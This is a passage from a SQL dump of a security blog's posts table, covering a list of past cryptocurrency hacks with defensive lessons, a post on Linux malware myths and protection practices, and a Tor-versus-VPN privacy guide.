class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Bitfinex Hack (August 2016)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $72M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> The hack bypassed security measures on the Bitfinex exchange, leading to substantial losses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Diversify security measures, including using hardware security modules (HSMs).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Ensure enhanced encryption for sensitive data and wallet keys.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Train employees on cybersecurity best practices regularly.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 
leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. The DAO Hack (May 2016)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting Recursive Call Bug</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $70M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> The hacker identified a vulnerability in The DAO’s smart contract related to recursive calls, enabling them to drain funds continuously.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct rigorous smart contract code reviews.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use formal verification techniques to validate smart contract logic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Leverage decentralized insurance mechanisms to mitigate losses.</li>\r\n</ul>\r\n<h2 class=\"font-bold 
text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Lessons from These Hacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Each of these incidents highlights the dangers posed by system vulnerabilities, social engineering attacks, and poor security practices. They also underscore the importance of continually evolving and improving crypto security practices to counter increasingly sophisticated attacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Strengthen Your Crypto Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are some practical tips to secure your cryptocurrency holdings against potential hacks:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Cold Storage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Store the majority of your funds offline in cold wallets. These wallets aren’t connected to the internet, making them immune to online hacking attempts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Enable Multi-Factor Authentication (MFA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set up MFA for all accounts, adding an extra layer of security. Even if a hacker gains your password, they won’t be able to access your funds without the secondary authentication factor.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Regularly Update Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep wallets and exchange platforms up to date with the latest security patches to minimize vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Be Aware of Phishing Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Always verify the legitimacy of emails, links, and websites before taking action. Never share your wallet’s private keys, and avoid clicking on suspicious links.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Use Reputable Exchanges</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stick to well-established exchanges with robust security measures, such as cold wallet storage and advanced threat monitoring.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Conduct Regular Security Audits</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Audit your systems and protocols regularly to identify and address weak points.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Stay Educated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep yourself updated on the latest trends, best practices, and common threats in crypto security. 
Being informed is one of your best defenses.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Closing Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Crypto hacks serve as a stark reminder of the evolving risks in the blockchain space. However, by implementing strong security measures and staying vigilant, individuals and organizations can significantly reduce their vulnerability to attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cryptocurrency depends heavily on trust and security. By learning from past breaches, adopting robust measures, and staying informed, we can help secure the digital financial ecosystem and build a safer environment for all users.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:23:46', '2026-01-12 21:41:44', 'History', 'Top Cryptocurrency Hacks: Lessons in Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(122, 'The Truth About Linux Viruses and How to Protect Your System', 'the-truth-about-linux-viruses-and-how-to-protect-your-system', '# Understanding Linux Security: Myths and Realities\n\nFor years, Linux users have embraced a sense of security, believing their systems were immune or significantly less vulnerable to viruses compared to other operating systems such as Windows. While Linux does offer robust security features, the idea that it is completely virus-free is a **myth**. Recent insights reveal that there are thousands of viruses targeting Linux systems, with over 100 new Linux viruses appearing in just two days.\n\nThis article explores the nature of Linux viruses, how they operate, and whether Linux users need antivirus software. Additionally, we\'ll discuss critical **best practices for securing Linux systems** to help you protect your devices.\n\n## The Prevalence of Linux Viruses\n\nContrary to popular belief, Linux systems are not immune to malware or viruses. While their occurrence might be less frequent compared to platforms like Windows, Linux has become a lucrative target for hackers—especially because the majority of **web servers** operate on this operating system.\n\nOne major area of attack is ransomware. For instance, cybercriminals deploy malicious scripts to gain persistence, escalate privileges, and manipulate files on Linux systems. These attacks highlight how Linux vulnerabilities can be exploited, particularly in environments with improper safeguards.\n\n## Why Linux Users Feel More Secure\n\nDespite the existence of Linux viruses, Linux desktop users often express higher confidence in their system’s security. This sense of security stems from a few distinct reasons:\n\n### 1. Smaller User Base\n\nLinux desktop users make up a relatively smaller share of the market compared to Windows. Hackers typically target platforms with larger user groups to maximize the reach and impact of their malware.\n\n### 2. 
Package Management Systems\n\nUnlike Windows, Linux users rely heavily on **official repositories** to download and install software. The use of package managers significantly lowers the chances of downloading malware since these repositories are curated and secure.\n\n### 3. Sudo Password Prompts\n\nLinux includes built-in access controls that require users to enter a `sudo` password to execute administrative tasks. This is an important defense layer and contrasts with the habits of many Windows users, who may quickly bypass User Account Control prompts.\n\n### 4. Open-Source Transparency\n\nBecause Linux is open-source, vulnerabilities are often identified and patched by its broad community of developers and users. This increases the likelihood of detecting and mitigating security risks early on.\n\n## Real-World Incidents Highlighting Linux Vulnerabilities\n\nWhile Linux desktops might be less frequently targeted, users are not completely safe. Take the **FreeDownloadManager incident** as an example. The official website was compromised, leading visitors to unknowingly download a malicious version of the software. This resulted in **data theft** for numerous users.\n\nThis incident emphasizes that security depends on more than just the platform—it requires user vigilance, frequent software updates, and proactive monitoring.\n\n## Best Practices for Protecting Linux Systems\n\nYou don’t need to live in fear of malware if you follow these **essential security practices** to protect your Linux systems.\n\n### 1. Stay Current with Updates\n\nAlways keep your Linux distribution and installed applications updated with the latest patches. Updates close potential security loopholes that could be exploited by hackers.\n\n### 2. Follow the Principle of Least Privilege\n\nAssign users only the permissions they absolutely need to perform their tasks. This strategy minimizes potential damage from unauthorized access.\n\n### 3. 
Utilize Data Encryption\n\nEncrypt your data—whether it’s at rest or in transit—to ensure it\'s accessible only to authorized users. Tools like **LUKS (Linux Unified Key Setup)** make full-disk encryption simple.\n\n### 4. Monitor Network Activity\n\nSecure your network by regularly checking for abnormal activity. Network monitoring tools such as **Wireshark** or **Snort** can detect unusual traffic patterns that may indicate a breach or emerging threat.\n\n### 5. Restrict Unnecessary Software\n\nLimit what you install to only the essential programs and services your system needs. Extra software increases the potential attack surface of your machine.\n\n### 6. Use Strong Authentication Tools\n\nImplement strong, unique passwords, use multi-factor authentication (MFA), and rely on SSH keys when required. These measures offer an additional layer of security.\n\n### 7. Regular Backups\n\nKeep regular backups of your files and system. If a ransomware attack encrypts your data, you can restore files without having to give in to their demands.\n\n## Do Linux Users Need Antivirus Software?\n\nThis question is one of the most debated topics in Linux communities, as the necessity of antivirus software depends largely on how the system is used.\n\nFor most users who stick to official repositories and avoid running untrusted scripts or binaries, antivirus software might seem unnecessary. However, users with **higher threat models** (e.g., handling sensitive data, or frequently interacting with unknown code) may benefit from antivirus solutions like **ClamAV**.\n\n### When to Consider Antivirus on Linux\n\n- You manage Linux servers that handle sensitive customer data.\n- Your system operates in a mixed OS environment with file sharing between Linux and Windows. 
(Antivirus can detect Windows-based malware that Linux users might inadvertently spread.)\n- You commonly download and run unverified code or binaries.\n\nClamAV, an open-source tool available in the repositories of most Linux distributions, offers real-time file scanning and can protect against a variety of malware threats.\n\n## Emerging Trends and Future Threats\n\nAs Linux grows more popular—particularly in enterprise server environments—the threat landscape evolves. Hackers are increasingly targeting Linux systems with more sophisticated malware. Ransomware that encrypts files **without requiring root privileges** is more prominent, while advanced exploits evade traditional antivirus tools.\n\nThis highlights the importance of **staying ahead of the curve** by keeping track of emerging threats and adopting proactive security measures.\n\n## Key Takeaways\n\nThe myth that Linux systems are virus-free is officially busted. While Linux is inherently a secure operating system, the evolving threat landscape puts every user at some level of risk.\n\nBy adopting the best practices shared in this article, Linux users can greatly reduce their vulnerability to malware. At the same time, understanding when antivirus software is appropriate ensures a balanced approach to staying secure.\n\nRemember, the key to **protecting Linux systems** lies in staying informed, being vigilant, and proactively securing your devices. By doing so, you can enjoy the security benefits of the Linux ecosystem while keeping threats at bay.\n\nProtect your system and safeguard your digital experience. 
Together, we can keep Linux secure.', '', 'http://infoseclabs.io/uploads/1773164030829-414018755.jpg', 'Illustration of a Linux system with a shield icon symbolizing protection against viruses', 1, 'published', '2026-03-09 20:22:00', '2026-03-10 20:33:53', 'Information Security', 'Linux Viruses: Protect Your System Effectively', 'Discover the truth about Linux viruses and learn essential protection tips for keeping your system secure.', 'Linux viruses'),
(123, 'Enhancing Online Privacy: Choosing Between Tor and VPN', 'enhancing-online-privacy-choosing-between-tor-and-vpn', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Internet has become an integral part of our daily activities. Whether you\'re browsing for information, shopping online, downloading files, or chatting with friends, your internet service provider (ISP) plays a central role in connecting you to the digital world. But how much of your activity can your ISP really monitor? Understanding this is key to maintaining your privacy and enhancing network security.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This detailed blog will break down what your ISP can and cannot see during common online activities, provide tips for secure browsing, and explain how tools like VPNs and Tor can protect your internet data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Can Your ISP See What You Do Online?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When discussing the extent of ISP visibility into your online activities, the answer depends on the type of connection (HTTP vs. HTTPS) and the tools you use.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Browsing the Internet</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When searching for something online, like using Google to look up health information, your ISP cannot see your search queries or results. What your ISP <b><strong class=\"font-bold\">can</strong></b> see is that you\'re connected to Google. 
If you click on a specific website, for instance, a hospital\'s blog, your ISP knows you\'re connected to that website but not the specific blog post you\'re reading.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why? This all comes down to the <b><strong class=\"font-bold\">Domain Name System (DNS)</strong></b> and encryption protocols.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">DNS Explained</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you access a website, your computer queries a DNS server to retrieve the website\'s IP address. This request is unencrypted, so your ISP can see which domains you\'re visiting, such as “examplehospital.com.”</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">HTTPS Protects Your Data</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you use websites that are secured with HTTPS, the information exchanged between you and the website is encrypted. This means your ISP cannot track which specific pages you visit or what content you view on those pages. 
With HTTP (unencrypted sites), however, all your content and actions can be monitored by your ISP.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip</strong></b>: Always pay attention to your browser warnings about unencrypted HTTP websites—they pose significant security risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Using Torrents and Downloading Files</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When downloading content, the level of visibility your ISP has largely depends on the protocol used.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Direct Downloads via HTTPS</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you download a file via HTTPS, your ISP knows you downloaded something from the file-sharing platform, but it cannot see the file\'s contents. Using HTTPS ensures a layer of encryption that safeguards your data.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Downloading Torrents</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With torrents, your ISP has more visibility. It can identify the specific torrent file downloaded and even access the file by downloading it themselves. 
While ISPs may not see the file\'s content directly, the lack of encryption makes torrenting more exposed.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To safeguard your activities, a Virtual Private Network (VPN) hides your IP and encrypts the data you exchange.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Online Shopping</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When shopping online, your ISP knows you\'re connected to a shopping platform like Amazon or eBay. However, due to HTTPS encryption on these websites, your overall shopping activity—like your purchases—remains private.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Emails and Messaging Apps</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Thankfully, emails and popular messaging apps like WhatsApp and Telegram use encryption to safeguard your communication. 
If you\'re sending emails through Gmail or accessing WhatsApp, your ISP can only see you\'re connected to the platform but cannot view your messages.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For emails sent via email clients like Thunderbird, encryption is handled in the background, protecting your sensitive information.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools to Protect Your Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enhancing your privacy on the internet requires adopting the right tools and practices to reduce your ISP’s ability to monitor your activities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use a Virtual Private Network (VPN)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A VPN encrypts all your internet traffic and routes it through a third-party server. This means your ISP can only see that you\'re connected to the VPN, but not the content of your internet activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Things to Keep in Mind</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Choose a reputable VPN provider. 
Free VPNs might compromise your privacy by selling your data to third parties.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A VPN is ideal for tasks like browsing securely, streaming, or downloading torrents.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Try Tor (The Onion Router)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For advanced anonymity, Tor sends your data through multiple volunteer-operated servers, ensuring no single server knows both your IP address and the website you’re visiting.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features of Tor</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Your internet activity passes through three computers (nodes). 
The first node sees your IP address, the middle node forwards encrypted data, and the final node knows only the destination website.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ideal for accessing specific websites anonymously.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Note</em></i>: Avoid using Tor for activities like logging into personal accounts to ensure anonymity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tor vs. VPN - Which Should You Use?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The right solution depends on your unique privacy needs.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">VPN</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Best for secure browsing, streaming, and downloading torrents.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Provides faster speeds compared to Tor.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Allows users to hide their browsing activities from ISPs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Tor</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Ideal for anonymity, especially when accessing specific websites without revealing your IP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">A great option for journalists, activists, or anyone navigating environments requiring high privacy.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools offer benefits, so choose based on the level of security and speed you need.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Tips for Secure Browsing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To further enhance your internet security and privacy, consider these cybersecurity tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use HTTPS websites whenever possible. 
A quick way to identify secure websites is by looking for a padlock icon in the browser address bar.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable DNS-over-HTTPS (DoH) in your browser to encrypt DNS requests.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your browser and firewall for added protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Avoid public Wi-Fi networks unless you’re using a VPN.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Take Charge of Your Data Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 